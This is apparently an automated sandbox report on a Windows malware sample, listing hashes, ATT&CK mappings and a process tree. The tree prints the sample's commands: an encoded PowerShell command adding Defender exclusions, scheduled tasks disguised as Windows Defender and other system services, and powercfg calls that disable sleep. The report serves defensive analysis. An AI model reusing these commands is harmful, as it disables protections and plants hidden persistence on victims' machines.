be7ba15c274112b511952287bd01a6c135e7b20260f307fc72fcd1a948188086

General

Target

file.exe
Size

3.2MB
MD5

502b810b213e6ea11cebaa86737c6f26
SHA1

9180f07a4cf3fea9b08e6e1828fb1b8d05805975
SHA256

be7ba15c274112b511952287bd01a6c135e7b20260f307fc72fcd1a948188086
SHA512

2ed47486212f832fc8c3f3f85137e489c7d6fe4b893acc74910362830ce778a6eab13ce95554f984028cc0953329b799d318df1088b94f7930db0e8a5a987e78
SSDEEP

12288:GNpYYoU9aGbHRFbOuuWompGy4y5vKk8U9tXnt9q:mpYVU9FP

Score

6^/10

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4436 4352 WerFault.exe schtasks.exe

pid	pid_target	process	target process
4436	4352	WerFault.exe	schtasks.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4352	schtasks.exe
400	schtasks.exe
3624	schtasks.exe
2148	schtasks.exe
1584	schtasks.exe
1212	schtasks.exe
4680	schtasks.exe
932	schtasks.exe
4628	schtasks.exe
4500	schtasks.exe
3808	schtasks.exe
2532	schtasks.exe
1316	schtasks.exe
4076	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

file.exepowershell.exe

pid process

764 file.exe
1464 powershell.exe
1464 powershell.exe

pid	process
764	file.exe
1464	powershell.exe
1464	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

file.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	764	file.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeShutdownPrivilege	3164	powercfg.exe
Token: SeCreatePagefilePrivilege	3164	powercfg.exe
Token: SeShutdownPrivilege	3608	powercfg.exe
Token: SeCreatePagefilePrivilege	3608	powercfg.exe
Token: SeShutdownPrivilege	2060	powercfg.exe
Token: SeCreatePagefilePrivilege	2060	powercfg.exe
Token: SeShutdownPrivilege	4068	powercfg.exe
Token: SeCreatePagefilePrivilege	4068	powercfg.exe
Token: SeShutdownPrivilege	2088	powercfg.exe
Token: SeCreatePagefilePrivilege	2088	powercfg.exe
Token: SeShutdownPrivilege	2088	powercfg.exe
Token: SeCreatePagefilePrivilege	2088	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 764 wrote to memory of 3436	764	file.exe	cmd.exe
PID 764 wrote to memory of 3436	764	file.exe	cmd.exe
PID 764 wrote to memory of 3436	764	file.exe	cmd.exe
PID 3436 wrote to memory of 1464	3436	cmd.exe	powershell.exe
PID 3436 wrote to memory of 1464	3436	cmd.exe	powershell.exe
PID 3436 wrote to memory of 1464	3436	cmd.exe	powershell.exe
PID 764 wrote to memory of 5028	764	file.exe	cmd.exe
PID 764 wrote to memory of 5028	764	file.exe	cmd.exe
PID 764 wrote to memory of 5028	764	file.exe	cmd.exe
PID 764 wrote to memory of 1728	764	file.exe	cmd.exe
PID 764 wrote to memory of 1728	764	file.exe	cmd.exe
PID 764 wrote to memory of 1728	764	file.exe	cmd.exe
PID 764 wrote to memory of 1276	764	file.exe	cmd.exe
PID 764 wrote to memory of 1276	764	file.exe	cmd.exe
PID 764 wrote to memory of 1276	764	file.exe	cmd.exe
PID 764 wrote to memory of 4612	764	file.exe	cmd.exe
PID 764 wrote to memory of 4612	764	file.exe	cmd.exe
PID 764 wrote to memory of 4612	764	file.exe	cmd.exe
PID 764 wrote to memory of 432	764	file.exe	cmd.exe
PID 764 wrote to memory of 432	764	file.exe	cmd.exe
PID 764 wrote to memory of 432	764	file.exe	cmd.exe
PID 764 wrote to memory of 1716	764	file.exe	cmd.exe
PID 764 wrote to memory of 1716	764	file.exe	cmd.exe
PID 764 wrote to memory of 1716	764	file.exe	cmd.exe
PID 764 wrote to memory of 2616	764	file.exe	cmd.exe
PID 764 wrote to memory of 2616	764	file.exe	cmd.exe
PID 764 wrote to memory of 2616	764	file.exe	cmd.exe
PID 764 wrote to memory of 3776	764	file.exe	cmd.exe
PID 764 wrote to memory of 3776	764	file.exe	cmd.exe
PID 764 wrote to memory of 3776	764	file.exe	cmd.exe
PID 764 wrote to memory of 228	764	file.exe	cmd.exe
PID 764 wrote to memory of 228	764	file.exe	cmd.exe
PID 764 wrote to memory of 228	764	file.exe	cmd.exe
PID 764 wrote to memory of 216	764	file.exe	cmd.exe
PID 764 wrote to memory of 216	764	file.exe	cmd.exe
PID 764 wrote to memory of 216	764	file.exe	cmd.exe
PID 764 wrote to memory of 1512	764	file.exe	cmd.exe
PID 764 wrote to memory of 1512	764	file.exe	cmd.exe
PID 764 wrote to memory of 1512	764	file.exe	cmd.exe
PID 764 wrote to memory of 1904	764	file.exe	cmd.exe
PID 764 wrote to memory of 1904	764	file.exe	cmd.exe
PID 764 wrote to memory of 1904	764	file.exe	cmd.exe
PID 764 wrote to memory of 3712	764	file.exe	cmd.exe
PID 764 wrote to memory of 3712	764	file.exe	cmd.exe
PID 764 wrote to memory of 3712	764	file.exe	cmd.exe
PID 764 wrote to memory of 4444	764	file.exe	cmd.exe
PID 764 wrote to memory of 4444	764	file.exe	cmd.exe
PID 764 wrote to memory of 4444	764	file.exe	cmd.exe
PID 5028 wrote to memory of 1212	5028	cmd.exe	schtasks.exe
PID 5028 wrote to memory of 1212	5028	cmd.exe	schtasks.exe
PID 5028 wrote to memory of 1212	5028	cmd.exe	schtasks.exe
PID 4612 wrote to memory of 4352	4612	cmd.exe	schtasks.exe
PID 4612 wrote to memory of 4352	4612	cmd.exe	schtasks.exe
PID 4612 wrote to memory of 4352	4612	cmd.exe	schtasks.exe
PID 432 wrote to memory of 3624	432	cmd.exe	schtasks.exe
PID 432 wrote to memory of 3624	432	cmd.exe	schtasks.exe
PID 432 wrote to memory of 3624	432	cmd.exe	schtasks.exe
PID 3776 wrote to memory of 3808	3776	cmd.exe	schtasks.exe
PID 3776 wrote to memory of 3808	3776	cmd.exe	schtasks.exe
PID 3776 wrote to memory of 3808	3776	cmd.exe	schtasks.exe
PID 2616 wrote to memory of 2148	2616	cmd.exe	schtasks.exe
PID 2616 wrote to memory of 2148	2616	cmd.exe	schtasks.exe
PID 2616 wrote to memory of 2148	2616	cmd.exe	schtasks.exe
PID 216 wrote to memory of 400	216	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAGUAawBtAG0ATgBaAHMARgBGAGcAdQBaAFEAawAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAAOABHAG0AdgA0AGUANgBhADYAOABKAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEYAaAAwAEMAZwBpAGUAaAA0AEEAZwBnAEcAawB1ACMAPgAgAEAAKAAgADwAIwBaAHoAUQB0AFgAYQBIACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBTADQAOABtAGsAbwBPAGsAaQBIAGEANgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcgBMAGQAUQBPAGQAZQBoAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMQBIAEoAaABDADEAWgAjAD4A"
2⤵
- Suspicious use of WriteProcessMemory
PID:3436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGUAawBtAG0ATgBaAHMARgBGAGcAdQBaAFEAawAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAAOABHAG0AdgA0AGUANgBhADYAOABKAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEYAaAAwAEMAZwBpAGUAaAA0AEEAZwBnAEcAawB1ACMAPgAgAEAAKAAgADwAIwBaAHoAUQB0AFgAYQBIACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBTADQAOABtAGsAbwBPAGsAaQBIAGEANgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcgBMAGQAUQBPAGQAZQBoAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMQBIAEoAaABDADEAWgAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo еш & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo юt
2⤵
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:1212

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ХЖя & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo АИБv0АеГипkЬуп6
2⤵
PID:1728

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:932

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo nрфsAPN3900 & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo кАДЩSKGRUиv
2⤵
PID:1276

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:4680

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ъиvAhгe9JхhyOех & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo дшчa5ТIЪиI
2⤵
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:4352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 476
4⤵
- Program crash
PID:4436

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo CTozX6ЪщйtnV & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo VЯIСШт9ЗитсЗdvLа2P
2⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:3624

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo НЖЩpuVэб9И & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo W
2⤵
PID:1716

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:4628

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo vбпксPeБЕШ & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo о1WTKгСiХв
2⤵
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:2148

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo eзШnзqЬaВоQ & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo лK
2⤵
- Suspicious use of WriteProcessMemory
PID:3776

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:3808

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo КЖnLуanL8ю & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_M3ЧcbшСъмhифЦЛbЕСПM" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo бjЙУd
2⤵
PID:228

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_M3ЧcbшСъмhифЦЛbЕСПM" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:4500

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo еmъЭHPTъХгhЪрЕyiф9h & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_RYцBu1" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 6GD
2⤵
- Suspicious use of WriteProcessMemory
PID:216

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_RYцBu1" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:400

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo wБgdЫЮКНWCwj6 & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_nFкjж9GмсаqыTУ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo sЛOфФРЫхЦRjЩсяnv
2⤵
PID:1512

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_nFкjж9GмсаqыTУ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:1584

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo eйgwдW & SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_Й27K3ОGрbСD" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo В8пФGэ
2⤵
PID:1904

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_Й27K3ОGрbСD" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:1316

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo LJюЩrрA2снОоtАЩ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ШrИsBЖuфЫтУ
2⤵
PID:4444

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:4076

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo бфэзdф3ШщАиж9уь & SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_ZZщrАl3ГЙ3ЕMФ0дГ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЛдajА4мЮkс
2⤵
PID:3712

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_ZZщrАl3ГЙ3ЕMФ0дГ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
3⤵
- Creates scheduled task(s)
PID:2532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4352 -ip 4352
1⤵
PID:2428

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/216-158-0x0000000000000000-mapping.dmp

Download
memory/228-157-0x0000000000000000-mapping.dmp

Download
memory/400-170-0x0000000000000000-mapping.dmp

Download
memory/432-153-0x0000000000000000-mapping.dmp

Download
memory/764-135-0x00000000071D0000-0x00000000071DA000-memory.dmp

Filesize
40KB

Download
memory/764-136-0x00000000073A0000-0x0000000007406000-memory.dmp

Filesize
408KB

Download
memory/764-132-0x0000000000260000-0x00000000002A2000-memory.dmp

Filesize
264KB

Download
memory/764-134-0x0000000007120000-0x00000000071B2000-memory.dmp

Filesize
584KB

Download
memory/764-133-0x0000000007610000-0x0000000007BB4000-memory.dmp

Filesize
5.6MB

Download
memory/932-171-0x0000000000000000-mapping.dmp

Download
memory/1212-164-0x0000000000000000-mapping.dmp

Download
memory/1276-150-0x0000000000000000-mapping.dmp

Download
memory/1316-175-0x0000000000000000-mapping.dmp

Download
memory/1464-145-0x0000000070110000-0x000000007015C000-memory.dmp

Filesize
304KB

Download
memory/1464-185-0x00000000078F0000-0x000000000790A000-memory.dmp

Filesize
104KB

Download
memory/1464-186-0x0000000005020000-0x0000000005028000-memory.dmp

Filesize
32KB

Download
memory/1464-138-0x0000000000000000-mapping.dmp

Download
memory/1464-151-0x0000000007580000-0x000000000759A000-memory.dmp

Filesize
104KB

Download
memory/1464-144-0x0000000007260000-0x0000000007292000-memory.dmp

Filesize
200KB

Download
memory/1464-149-0x0000000007BD0000-0x000000000824A000-memory.dmp

Filesize
6.5MB

Download
memory/1464-184-0x0000000004FF0000-0x0000000004FFE000-memory.dmp

Filesize
56KB

Download
memory/1464-143-0x0000000006280000-0x000000000629E000-memory.dmp

Filesize
120KB

Download
memory/1464-139-0x0000000002CA0000-0x0000000002CD6000-memory.dmp

Filesize
216KB

Download
memory/1464-146-0x0000000006810000-0x000000000682E000-memory.dmp

Filesize
120KB

Download
memory/1464-142-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/1464-165-0x0000000007810000-0x00000000078A6000-memory.dmp

Filesize
600KB

Download
memory/1464-141-0x00000000052D0000-0x00000000052F2000-memory.dmp

Filesize
136KB

Download
memory/1464-160-0x0000000007600000-0x000000000760A000-memory.dmp

Filesize
40KB

Download
memory/1464-140-0x0000000005410000-0x0000000005A38000-memory.dmp

Filesize
6.2MB

Download
memory/1512-159-0x0000000000000000-mapping.dmp

Download
memory/1584-173-0x0000000000000000-mapping.dmp

Download
memory/1716-154-0x0000000000000000-mapping.dmp

Download
memory/1728-148-0x0000000000000000-mapping.dmp

Download
memory/1904-161-0x0000000000000000-mapping.dmp

Download
memory/2060-180-0x0000000000000000-mapping.dmp

Download
memory/2088-182-0x0000000000000000-mapping.dmp

Download
memory/2148-169-0x0000000000000000-mapping.dmp

Download
memory/2532-174-0x0000000000000000-mapping.dmp

Download
memory/2616-155-0x0000000000000000-mapping.dmp

Download
memory/3164-178-0x0000000000000000-mapping.dmp

Download
memory/3436-137-0x0000000000000000-mapping.dmp

Download
memory/3608-179-0x0000000000000000-mapping.dmp

Download
memory/3624-167-0x0000000000000000-mapping.dmp

Download
memory/3712-162-0x0000000000000000-mapping.dmp

Download
memory/3776-156-0x0000000000000000-mapping.dmp

Download
memory/3808-168-0x0000000000000000-mapping.dmp

Download
memory/4068-181-0x0000000000000000-mapping.dmp

Download
memory/4076-183-0x0000000000000000-mapping.dmp

Download
memory/4352-166-0x0000000000000000-mapping.dmp

Download
memory/4444-163-0x0000000000000000-mapping.dmp

Download
memory/4500-177-0x0000000000000000-mapping.dmp

Download
memory/4612-152-0x0000000000000000-mapping.dmp

Download
memory/4628-176-0x0000000000000000-mapping.dmp

Download
memory/4680-172-0x0000000000000000-mapping.dmp

Download
memory/5028-147-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads